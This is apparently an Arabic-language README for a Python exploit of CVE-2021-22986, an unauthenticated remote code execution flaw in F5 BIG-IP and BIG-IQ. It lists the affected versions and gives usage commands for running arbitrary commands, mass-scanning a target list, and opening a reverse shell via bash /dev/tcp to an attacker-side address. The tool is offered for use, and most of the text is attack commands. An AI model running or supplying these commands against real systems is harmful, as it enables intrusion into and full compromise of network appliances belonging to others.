
استغلال Python لـ CVE-2021-22986، يتيح RCE غير مصادق عليه على F5 BIG-IP و BIG-IQ عبر iControl REST، مع تنفيذ الأوامر، والفحص الجماعي، وميزات القشرة العكسية.
تسمح هذه الثغرة للمهاجمين غير الموثوقين الذين لديهم وصول شبكي إلى واجهة iControl REST، عبر واجهة إدارة BIG-IP وعناوين IP الذاتية، بتنفيذ أوامر نظام عشوائية، وإنشاء أو حذف الملفات، وتعطيل الخدمات. لا يمكن استغلال هذه الثغرة إلا من خلال مستوى التحكم (control plane) وليس من خلال مستوى البيانات (data plane). قد يؤدي الاستغلال إلى اختراق كامل للنظام. نظام BIG-IP في وضع Appliance معرض أيضًا للخطر.
F5 BIG-IQ 6.0.0-6.1.0 F5 BIG-IQ 7.0.0-7.0.0.1 F5 BIG-IQ 7.1.0-7.1.0.2 F5 BIG-IP 12.1.0-12.1.5.2 F5 BIG-IP 13.1.0-13.1.3.5 F5 BIG-IP 14.1.0-14.1.3.1 F5 BIG-IP 15.1.0-15.1.2 F5 BIG-IP 16.0.0-16.0.1
python3 CVE_2021_22986.py
python3 CVE_2021_22986.py -v true -u https://192.168.174.164
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c id
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c whoami
python3 CVE_2021_22986.py -s true -f check.txt
python3 CVE_2021_22986.py -r true -u https://192.168.174.164 -c "bash -i >&/dev/tcp/192.168.174.129/8888 0>&1"
python3 newpoc.py https://192.168.174.164